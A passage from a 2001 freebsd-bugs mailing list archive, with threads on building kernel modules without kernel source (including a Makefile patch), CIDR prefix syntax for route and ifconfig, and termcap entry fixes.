direction that we want to take? >> >> We don't want to check in generated files. We have more than enough >> trouble with that as it is with the syscalls.master derived stuff. > >I guess I really wanted to ask if being able to build KLDs without >kernel source is something we should be aiming for, and if so, what >direction to take for doing that. To my knowledge that is not a goal. -- Poul-Henning Kamp | UNIX since Zilog Zeus 3.20 phk@FreeBSD.ORG | TCP/IP since RFC 956 FreeBSD committer | BSD since 4.3-tahoe Never attribute to malice what can adequately be explained by incompetence. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Jun 8 2:15:44 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id F291737B403; Fri, 8 Jun 2001 02:15:41 -0700 (PDT) (envelope-from markp@FreeBSD.org) Received: (from markp@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f589Ff939550; Fri, 8 Jun 2001 02:15:41 -0700 (PDT) (envelope-from markp) Date: Fri, 8 Jun 2001 02:15:41 -0700 (PDT) From: Message-Id: <200106080915.f589Ff939550@freefall.freebsd.org> To: markp@FreeBSD.org, freebsd-ports@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: conf/22695: MAKEDEV has no entry for cfs0, the device needed for the coda client Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: MAKEDEV has no entry for cfs0, the device needed for the coda client Responsible-Changed-From-To: freebsd-ports->freebsd-bugs Responsible-Changed-By: markp Responsible-Changed-When: Fri Jun 8 02:14:20 PDT 2001 Responsible-Changed-Why: Misfiled PR http://www.FreeBSD.org/cgi/query-pr.cgi?pr=22695 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Jun 8 2:20: 8 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id B387E37B403 for ; Fri, 8 Jun 2001 02:20:02 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f589K2Z40047; Fri, 8 Jun 2001 02:20:02 -0700 (PDT) (envelope-from gnats) Date: Fri, 8 Jun 2001 02:20:02 -0700 (PDT) Message-Id: <200106080920.f589K2Z40047@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Ruslan Ermilov Subject: Re: bin/14175: route for ip aliasing Reply-To: Ruslan Ermilov Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR bin/14175; it has been noted by GNATS. From: Ruslan Ermilov To: "Vladimir B. Grebenschikov" Cc: freebsd-gnats-submit@FreeBSD.org, jch@oleane.net Subject: Re: bin/14175: route for ip aliasing Date: Fri, 8 Jun 2001 12:08:48 +0300 Thanks for reminding! Fixed in route.c,v 1.46 and route.8,v 1.24. On Thu, Jun 07, 2001 at 06:23:31PM +0400, Vladimir B. Grebenschikov wrote: > ru@FreeBSD.ORG writes: > > Synopsis: route for ip aliasing > > > > State-Changed-From-To: open->closed > > State-Changed-By: ru > > State-Changed-When: Thu Jun 7 07:00:15 PDT 2001 > > State-Changed-Why: > > Asked and answered. > > Actual I think not good idea support different address schemes for > netstat -r and route(8) utilites: > > # route add 10.0.0.0/16 192.168.14.1 > add net 10.0.0.0: gateway 192.168.14.1 > # netstat -rn | egrep \^10 > 10/16 192.168.14.1 UGSc 0 0 fxp0 > # route delete 10/16 > route: writing to routing socket: No such process > delete net 10: not in table > # route delete 10.0.0.0/16 > delete net 10.0.0.0 > # > > if netstat deal with addreses like 10/16, I think route need to deal > with them too. > > -- > TSB Russian Express, Moscow > Vladimir B. Grebenschikov, vova@express.ru -- Ruslan Ermilov Oracle Developer/DBA, ru@sunbay.com Sunbay Software AG, ru@FreeBSD.org FreeBSD committer, +380.652.512.251 Simferopol, Ukraine http://www.FreeBSD.org The Power To Serve http://www.oracle.com Enabling The Information Age To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Jun 8 2:27:17 2001 Delivered-To: freebsd-bugs@freebsd.org Received: from assaris.sics.se (assaris.sics.se [193.10.66.234]) by hub.freebsd.org (Postfix) with ESMTP id 0DDFE37B405 for ; Fri, 8 Jun 2001 02:27:13 -0700 (PDT) (envelope-from assar@assaris.sics.se) Received: (from assar@localhost) by assaris.sics.se (8.9.3/8.9.3) id LAA62305; Fri, 8 Jun 2001 11:27:05 +0200 (CEST) (envelope-from assar) From: assar@stacken.kth.se To: Poul-Henning Kamp Cc: freebsd-bugs@FreeBSD.org Subject: Re: kern/17613: impossible to build FS KLD without kernel source References: <4781.991989636@critter> Date: 08 Jun 2001 11:27:05 +0200 In-Reply-To: Poul-Henning Kamp's message of "Fri, 08 Jun 2001 10:40:36 +0200" Message-ID: <5l3d9b7252.fsf@assaris.sics.se> Lines: 67 User-Agent: Gnus/5.070098 (Pterodactyl Gnus v0.98) Emacs/20.6 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Poul-Henning Kamp writes: > >> >> It is belived that this is not the direction we want to take. > >> > > >> >Which is then the direction that we want to take? > >> > >> We don't want to check in generated files. We have more than enough > >> trouble with that as it is with the syscalls.master derived stuff. > > > >I guess I really wanted to ask if being able to build KLDs without > >kernel source is something we should be aiming for, and if so, what > >direction to take for doing that. > > To my knowledge that is not a goal. I think it should be a goal. Is it ok if this is done without more generated files in CVS? For example, by having include/Makefile generate and install it? See the patch below for illustration. /assar Index: Makefile =================================================================== RCS file: /home/ncvs/src/include/Makefile,v retrieving revision 1.125 diff -u -w -u -w -r1.125 Makefile --- Makefile 2000/10/16 07:00:18 1.125 +++ Makefile 2001/06/08 09:23:40 @@ -6,7 +6,7 @@ # The ``rm -rf''s used below are safe because rm doesn't follow symbolic # links. -CLEANFILES= osreldate.h version vers.c +CLEANFILES= osreldate.h version vers.c vnode_if.h SUBDIR= rpcsvc FILES= a.out.h ar.h assert.h bitstring.h ctype.h db.h dirent.h disktab.h \ dlfcn.h elf.h err.h fnmatch.h fstab.h \ @@ -59,7 +59,7 @@ #SHARED= symlinks SHARED?= copies -all: osreldate.h +all: osreldate.h vnode_if.h osreldate.h: ${.CURDIR}/../sys/conf/newvers.sh \ ${.CURDIR}/../sys/sys/param.h @@ -70,6 +70,11 @@ echo \#'undef __FreeBSD_version' >> osreldate.h; \ echo \#'define __FreeBSD_version' $$RELDATE >> osreldate.h +vnode_if.h: ${.CURDIR}/../sys/kern/vnode_if.pl \ + ${.CURDIR}/../sys/kern/vnode_if.src + @${ECHO} creating vnode_if.h + perl ${.CURDIR}/../sys/kern/vnode_if.pl -h ${.CURDIR}/../sys/kern/vnode_if.src + beforeinstall: ${SHARED} @rm -f ${DESTDIR}/usr/include/timepps.h cd ${.CURDIR}; \ @@ -87,6 +92,9 @@ ${INSTALL} -C -o ${BINOWN} -g ${BINGRP} -m 444 \ ${.OBJDIR}/osreldate.h \ ${DESTDIR}/usr/include + ${INSTALL} -C -o ${BINOWN} -g ${BINGRP} -m 444 \ + ${.OBJDIR}/vnode_if.h \ + ${DESTDIR}/usr/include/sys .for i in ${LFILES} ln -sf sys/$i ${DESTDIR}/usr/include/$i .endfor To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Jun 8 2:30:13 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 399CA37B401 for ; Fri, 8 Jun 2001 02:30:02 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f589U2W41036; Fri, 8 Jun 2001 02:30:02 -0700 (PDT) (envelope-from gnats) Date: Fri, 8 Jun 2001 02:30:02 -0700 (PDT) Message-Id: <200106080930.f589U2W41036@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: "Vladimir B. Grebenschikov" Subject: Re: bin/14175: route for ip aliasing Reply-To: "Vladimir B. Grebenschikov" Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR bin/14175; it has been noted by GNATS. From: "Vladimir B. Grebenschikov" To: Ruslan Ermilov Cc: "Vladimir B. Grebenschikov" , freebsd-gnats-submit@FreeBSD.org, jch@oleane.net Subject: Re: bin/14175: route for ip aliasing Date: Fri, 8 Jun 2001 13:23:58 +0400 (MSD) Ruslan Ermilov writes: > Thanks for reminding! > Fixed in route.c,v 1.46 and route.8,v 1.24. May be allow similar semantic in ifconfig too ? ifconfig if0 192.168.1.1/28 instead of ifconfig if0 192.168.1.1 netmask 255.255.255.240 ? > On Thu, Jun 07, 2001 at 06:23:31PM +0400, Vladimir B. Grebenschikov wrote: > > ru@FreeBSD.ORG writes: > > > Synopsis: route for ip aliasing > > > > > > State-Changed-From-To: open->closed > > > State-Changed-By: ru > > > State-Changed-When: Thu Jun 7 07:00:15 PDT 2001 > > > State-Changed-Why: > > > Asked and answered. > > > > Actual I think not good idea support different address schemes for > > netstat -r and route(8) utilites: > > > > # route add 10.0.0.0/16 192.168.14.1 > > add net 10.0.0.0: gateway 192.168.14.1 > > # netstat -rn | egrep \^10 > > 10/16 192.168.14.1 UGSc 0 0 fxp0 > > # route delete 10/16 > > route: writing to routing socket: No such process > > delete net 10: not in table > > # route delete 10.0.0.0/16 > > delete net 10.0.0.0 > > # > > > > if netstat deal with addreses like 10/16, I think route need to deal > > with them too. > > > > -- > > TSB Russian Express, Moscow > > Vladimir B. Grebenschikov, vova@express.ru > > -- > Ruslan Ermilov Oracle Developer/DBA, > ru@sunbay.com Sunbay Software AG, > ru@FreeBSD.org FreeBSD committer, > +380.652.512.251 Simferopol, Ukraine > > http://www.FreeBSD.org The Power To Serve > http://www.oracle.com Enabling The Information Age > -- TSB Russian Express, Moscow Vladimir B. Grebenschikov, vova@express.ru To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Jun 8 2:30:17 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 71BA737B406 for ; Fri, 8 Jun 2001 02:30:03 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f589U3o41041; Fri, 8 Jun 2001 02:30:03 -0700 (PDT) (envelope-from gnats) Date: Fri, 8 Jun 2001 02:30:03 -0700 (PDT) Message-Id: <200106080930.f589U3o41041@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Jean-Claude Christophe Subject: Re: bin/14175: route for ip aliasing Reply-To: Jean-Claude Christophe Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR bin/14175; it has been noted by GNATS. From: Jean-Claude Christophe To: "Vladimir B. Grebenschikov" Cc: Ruslan Ermilov , freebsd-gnats-submit@FreeBSD.org Subject: Re: bin/14175: route for ip aliasing Date: Fri, 8 Jun 2001 11:29:53 +0200 > Ruslan Ermilov writes: > > Thanks for reminding! > > Fixed in route.c,v 1.46 and route.8,v 1.24. > > May be allow similar semantic in ifconfig too ? > > ifconfig if0 192.168.1.1/28 > instead of > ifconfig if0 192.168.1.1 netmask 255.255.255.240 > ? instead of, no. It's important to let the actual configuration parameters of ifconfig. However, add the prefix in the parameters of ifconfig can be consider as a different way to set the mask and should be appreciate. > > > On Thu, Jun 07, 2001 at 06:23:31PM +0400, Vladimir B. Grebenschikov wrote: > > > ru@FreeBSD.ORG writes: > > > > Synopsis: route for ip aliasing > > > > > > > > State-Changed-From-To: open->closed > > > > State-Changed-By: ru > > > > State-Changed-When: Thu Jun 7 07:00:15 PDT 2001 > > > > State-Changed-Why: > > > > Asked and answered. > > > > > > Actual I think not good idea support different address schemes for > > > netstat -r and route(8) utilites: > > > > > > # route add 10.0.0.0/16 192.168.14.1 > > > add net 10.0.0.0: gateway 192.168.14.1 > > > # netstat -rn | egrep \^10 > > > 10/16 192.168.14.1 UGSc 0 0 fxp0 > > > # route delete 10/16 > > > route: writing to routing socket: No such process > > > delete net 10: not in table > > > # route delete 10.0.0.0/16 > > > delete net 10.0.0.0 > > > # > > > > > > if netstat deal with addreses like 10/16, I think route need to deal > > > with them too. > > > > > > -- > > > TSB Russian Express, Moscow > > > Vladimir B. Grebenschikov, vova@express.ru > > > > -- > > Ruslan Ermilov Oracle Developer/DBA, > > ru@sunbay.com Sunbay Software AG, > > ru@FreeBSD.org FreeBSD committer, > > +380.652.512.251 Simferopol, Ukraine > > > > http://www.FreeBSD.org The Power To Serve > > http://www.oracle.com Enabling The Information Age > > > > -- > TSB Russian Express, Moscow > Vladimir B. Grebenschikov, vova@express.ru -- Jean-Claude Christophe / jch@oleane.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Jun 8 2:37:17 2001 Delivered-To: freebsd-bugs@freebsd.org Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.13]) by hub.freebsd.org (Postfix) with SMTP id B439837B403 for ; Fri, 8 Jun 2001 02:37:13 -0700 (PDT) (envelope-from roam@orbitel.bg) Received: (qmail 34462 invoked by uid 1000); 8 Jun 2001 09:35:59 -0000 Date: Fri, 8 Jun 2001 12:35:59 +0300 From: Peter Pentchev To: sobomax@FreeBSD.org Cc: freebsd-bugs@FreeBSD.org Subject: Re: bin/23710: [PATCH] there is no termcap(3) manpage per se Message-ID: <20010608123559.G19938@ringworld.oblivion.bg> Mail-Followup-To: sobomax@FreeBSD.org, freebsd-bugs@FreeBSD.org References: <200106080927.f589ReM40861@freefall.freebsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200106080927.f589ReM40861@freefall.freebsd.org>; from sobomax@FreeBSD.org on Fri, Jun 08, 2001 at 02:27:40AM -0700 Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Fri, Jun 08, 2001 at 02:27:40AM -0700, sobomax@FreeBSD.org wrote: > Synopsis: [PATCH] there is no termcap(3) manpage per se > > State-Changed-From-To: open->closed > State-Changed-By: sobomax > State-Changed-When: Fri Jun 8 02:27:20 PDT 2001 > State-Changed-Why: > Similar patch has been committed, thank you for reporting! Actually, I had already forgotten the PR :) Dima reminded me, when I suddenly got the submitter-targeted mail when he turned the PR over to you. Thank you for this and all the other manpage fixes! G'luck, Peter -- This inert sentence is my body, but my soul is alive, dancing in the sparks of your brain. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Jun 8 2:40: 6 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 22BCA37B403 for ; Fri, 8 Jun 2001 02:40:03 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f589e3X41872; Fri, 8 Jun 2001 02:40:03 -0700 (PDT) (envelope-from gnats) Date: Fri, 8 Jun 2001 02:40:03 -0700 (PDT) Message-Id: <200106080940.f589e3X41872@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: "Vladimir B. Grebenschikov" Subject: Re: bin/14175: route for ip aliasing Reply-To: "Vladimir B. Grebenschikov" Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR bin/14175; it has been noted by GNATS. From: "Vladimir B. Grebenschikov" To: Jean-Claude Christophe Cc: "Vladimir B. Grebenschikov" , Ruslan Ermilov , freebsd-gnats-submit@FreeBSD.org Subject: Re: bin/14175: route for ip aliasing Date: Fri, 8 Jun 2001 13:37:01 +0400 (MSD) Jean-Claude Christophe writes: > > Ruslan Ermilov writes: > > > Thanks for reminding! > > > Fixed in route.c,v 1.46 and route.8,v 1.24. > > > > May be allow similar semantic in ifconfig too ? > > > > ifconfig if0 192.168.1.1/28 > > instead of > > ifconfig if0 192.168.1.1 netmask 255.255.255.240 > > ? > > instead of, no. > It's important to let the actual configuration parameters of ifconfig. > However, add the prefix in the parameters of ifconfig can be consider > as a different way to set the mask and should be appreciate. Of course, I mean only one more possible way. -- TSB Russian Express, Moscow Vladimir B. Grebenschikov, vova@express.ru To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Jun 8 3: 3:46 2001 Delivered-To: freebsd-bugs@freebsd.org Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.86.163]) by hub.freebsd.org (Postfix) with ESMTP id BC73C37B403 for ; Fri, 8 Jun 2001 03:03:40 -0700 (PDT) (envelope-from phk@critter.freebsd.dk) Received: from critter (localhost [127.0.0.1]) by critter.freebsd.dk (8.11.3/8.11.3) with ESMTP id f58A3T105514; Fri, 8 Jun 2001 12:03:29 +0200 (CEST) (envelope-from phk@critter.freebsd.dk) To: assar@stacken.kth.se Cc: freebsd-bugs@FreeBSD.org Subject: Re: kern/17613: impossible to build FS KLD without kernel source In-Reply-To: Your message of "08 Jun 2001 11:27:05 +0200." <5l3d9b7252.fsf@assaris.sics.se> Date: Fri, 08 Jun 2001 12:03:29 +0200 Message-ID: <5512.991994609@critter> From: Poul-Henning Kamp Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I'm really not our makefile wizard, I think you should ask on arch@ In message <5l3d9b7252.fsf@assaris.sics.se>, assar@stacken.kth.se writes: >Poul-Henning Kamp writes: >> >> >> It is belived that this is not the direction we want to take. >> >> > >> >> >Which is then the direction that we want to take? >> >> >> >> We don't want to check in generated files. We have more than enough >> >> trouble with that as it is with the syscalls.master derived stuff. >> > >> >I guess I really wanted to ask if being able to build KLDs without >> >kernel source is something we should be aiming for, and if so, what >> >direction to take for doing that. >> >> To my knowledge that is not a goal. > >I think it should be a goal. Is it ok if this is done without more >generated files in CVS? For example, by having include/Makefile >generate and install it? See the patch below for illustration. > >/assar > >Index: Makefile >=================================================================== >RCS file: /home/ncvs/src/include/Makefile,v >retrieving revision 1.125 >diff -u -w -u -w -r1.125 Makefile >--- Makefile 2000/10/16 07:00:18 1.125 >+++ Makefile 2001/06/08 09:23:40 >@@ -6,7 +6,7 @@ > # The ``rm -rf''s used below are safe because rm doesn't follow symbolic > # links. > >-CLEANFILES= osreldate.h version vers.c >+CLEANFILES= osreldate.h version vers.c vnode_if.h > SUBDIR= rpcsvc > FILES= a.out.h ar.h assert.h bitstring.h ctype.h db.h dirent.h disktab.h \ > dlfcn.h elf.h err.h fnmatch.h fstab.h \ >@@ -59,7 +59,7 @@ > #SHARED= symlinks > SHARED?= copies > >-all: osreldate.h >+all: osreldate.h vnode_if.h > > osreldate.h: ${.CURDIR}/../sys/conf/newvers.sh \ > ${.CURDIR}/../sys/sys/param.h >@@ -70,6 +70,11 @@ > echo \#'undef __FreeBSD_version' >> osreldate.h; \ > echo \#'define __FreeBSD_version' $$RELDATE >> osreldate.h > >+vnode_if.h: ${.CURDIR}/../sys/kern/vnode_if.pl \ >+ ${.CURDIR}/../sys/kern/vnode_if.src >+ @${ECHO} creating vnode_if.h >+ perl ${.CURDIR}/../sys/kern/vnode_if.pl -h ${.CURDIR}/../sys/kern/vnode_if.src >+ > beforeinstall: ${SHARED} > @rm -f ${DESTDIR}/usr/include/timepps.h > cd ${.CURDIR}; \ >@@ -87,6 +92,9 @@ > ${INSTALL} -C -o ${BINOWN} -g ${BINGRP} -m 444 \ > ${.OBJDIR}/osreldate.h \ > ${DESTDIR}/usr/include >+ ${INSTALL} -C -o ${BINOWN} -g ${BINGRP} -m 444 \ >+ ${.OBJDIR}/vnode_if.h \ >+ ${DESTDIR}/usr/include/sys > .for i in ${LFILES} > ln -sf sys/$i ${DESTDIR}/usr/include/$i > .endfor > -- Poul-Henning Kamp | UNIX since Zilog Zeus 3.20 phk@FreeBSD.ORG | TCP/IP since RFC 956 FreeBSD committer | BSD since 4.3-tahoe Never attribute to malice what can adequately be explained by incompetence. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Jun 8 3:20: 7 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 9B7A637B407 for ; Fri, 8 Jun 2001 03:20:02 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f58AK2l47774; Fri, 8 Jun 2001 03:20:02 -0700 (PDT) (envelope-from gnats) Date: Fri, 8 Jun 2001 03:20:02 -0700 (PDT) Message-Id: <200106081020.f58AK2l47774@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Ruslan Ermilov Subject: Re: bin/14175: route for ip aliasing Reply-To: Ruslan Ermilov Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR bin/14175; it has been noted by GNATS. From: Ruslan Ermilov To: "Vladimir B. Grebenschikov" Cc: freebsd-gnats-submit@FreeBSD.org, jch@oleane.net Subject: Re: bin/14175: route for ip aliasing Date: Fri, 8 Jun 2001 13:16:16 +0300 On Fri, Jun 08, 2001 at 01:23:58PM +0400, Vladimir B. Grebenschikov wrote: > Ruslan Ermilov writes: > > Thanks for reminding! > > Fixed in route.c,v 1.46 and route.8,v 1.24. > > May be allow similar semantic in ifconfig too ? > > ifconfig if0 192.168.1.1/28 > instead of > ifconfig if0 192.168.1.1 netmask 255.255.255.240 > ? > It's already available in 5.0-CURRENT and 4.3-STABLE. With the exception that the syntax for ifconfig(8) is host/mask. Cheers, -- Ruslan Ermilov Oracle Developer/DBA, ru@sunbay.com Sunbay Software AG, ru@FreeBSD.org FreeBSD committer, +380.652.512.251 Simferopol, Ukraine http://www.FreeBSD.org The Power To Serve http://www.oracle.com Enabling The Information Age To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Jun 8 4:28:49 2001 Delivered-To: freebsd-bugs@freebsd.org Received: from logatome.francenet.fr (logatome-2.francenet.fr [193.149.96.2]) by hub.freebsd.org (Postfix) with ESMTP id 082F937B401; Fri, 8 Jun 2001 04:28:39 -0700 (PDT) (envelope-from e-masson@kisoft-services.com) Received: from notbsdems.nantes.kisoft-services.com (pppA150.francenet.fr [193.149.100.60]) by logatome.francenet.fr (8.10.1/8.11.1) with ESMTP id f58BSXa92016; Fri, 8 Jun 2001 13:28:34 +0200 (CEST) Received: by notbsdems.nantes.kisoft-services.com (Postfix, from userid 1001) id 88097E6DC3; Fri, 8 Jun 2001 12:35:21 +0200 (CEST) To: FreeBSD-gnats-submit@FreeBSD.org Subject: New termcap entry for cygwin terms From: e-masson@kisoft-services.com Reply-To: e-masson@kisoft-services.com Cc: freebsd-bugs@FreeBSD.org X-send-pr-version: 3.113 X-GNATS-Notify: Message-Id: <20010608103521.88097E6DC3@notbsdems.nantes.kisoft-services.com> Date: Fri, 8 Jun 2001 12:35:21 +0200 (CEST) Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Submitter-Id: current-users >Originator: Eric Masson >Organization: Kisoft Services >Confidential: no >Synopsis: Add cygwin termcap entry >Severity: non-critical >Priority: low >Category: conf >Class: update >Release: FreeBSD 4.3-STABLE i386 >Environment: System: FreeBSD notbsdems.nantes.kisoft-services.com 4.3-STABLE FreeBSD 4.3-STABLE #0: Sun Jun 3 10:48:51 CEST 2001 root@notbsdems.nantes.kisoft-services.com:/usr/obj/usr/src/sys/THINKPAD i386 >Description: N/A >How-To-Repeat: N/A >Fix: --- termcap.original Sun Jun 3 12:52:19 2001 +++ termcap Fri Jun 8 12:12:39 2001 @@ -4169,6 +4169,9 @@ linux-m|Linux Console no color:\ :pa@:Co@:AF@:AB@:op@:\ :tc=linux: +# TERMCAP entry for cygnus windows terminals +cygwin:\ + :xn@:op=\E[39;49m:Km=\E[M:tc=linux: # Termcap for Top Gun Telnet and SSH on the Palm Pilot. # http://www.isaac.cs.berkeley.edu/pilot/tgtelnet.html To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Jun 8 4:30: 9 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 1288837B408 for ; Fri, 8 Jun 2001 04:30:03 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f58BU3761131; Fri, 8 Jun 2001 04:30:03 -0700 (PDT) (envelope-from gnats) Received: from logatome.francenet.fr (logatome-2.francenet.fr [193.149.96.2]) by hub.freebsd.org (Postfix) with ESMTP id 082F937B401; Fri, 8 Jun 2001 04:28:39 -0700 (PDT) (envelope-from e-masson@kisoft-services.com) Received: from notbsdems.nantes.kisoft-services.com (pppA150.francenet.fr [193.149.100.60]) by logatome.francenet.fr (8.10.1/8.11.1) with ESMTP id f58BSXa92016; Fri, 8 Jun 2001 13:28:34 +0200 (CEST) Received: by notbsdems.nantes.kisoft-services.com (Postfix, from userid 1001) id 88097E6DC3; Fri, 8 Jun 2001 12:35:21 +0200 (CEST) Message-Id: <20010608103521.88097E6DC3@notbsdems.nantes.kisoft-services.com> Date: Fri, 8 Jun 2001 12:35:21 +0200 (CEST) From: e-masson@kisoft-services.com Reply-To: e-masson@kisoft-services.com To: FreeBSD-gnats-submit@FreeBSD.org Cc: freebsd-bugs@FreeBSD.org X-Send-Pr-Version: 3.113 Subject: conf/27959: New termcap entry for cygwin terms Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 27959 >Category: conf >Synopsis: Add cygwin termcap entry >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: update >Submitter-Id: current-users >Arrival-Date: Fri Jun 08 04:30:02 PDT 2001 >Closed-Date: >Last-Modified: >Originator: Eric Masson >Release: FreeBSD 4.3-STABLE i386 >Organization: Kisoft Services >Environment: System: FreeBSD notbsdems.nantes.kisoft-services.com 4.3-STABLE FreeBSD 4.3-STABLE #0: Sun Jun 3 10:48:51 CEST 2001 root@notbsdems.nantes.kisoft-services.com:/usr/obj/usr/src/sys/THINKPAD i386 >Description: N/A >How-To-Repeat: N/A >Fix: --- termcap.original Sun Jun 3 12:52:19 2001 +++ termcap Fri Jun 8 12:12:39 2001 @@ -4169,6 +4169,9 @@ linux-m|Linux Console no color:\ :pa@:Co@:AF@:AB@:op@:\ :tc=linux: +# TERMCAP entry for cygnus windows terminals +cygwin:\ + :xn@:op=\E[39;49m:Km=\E[M:tc=linux: # Termcap for Top Gun Telnet and SSH on the Palm Pilot. # http://www.isaac.cs.berkeley.edu/pilot/tgtelnet.html >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Jun 8 4:50: 9 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 8BB4637B407 for ; Fri, 8 Jun 2001 04:50:03 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f58Bo3Z63005; Fri, 8 Jun 2001 04:50:03 -0700 (PDT) (envelope-from gnats) Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id C4FA037B403 for ; Fri, 8 Jun 2001 04:43:41 -0700 (PDT) (envelope-from nobody@FreeBSD.org) Received: (from nobody@localhost) by freefall.freebsd.org 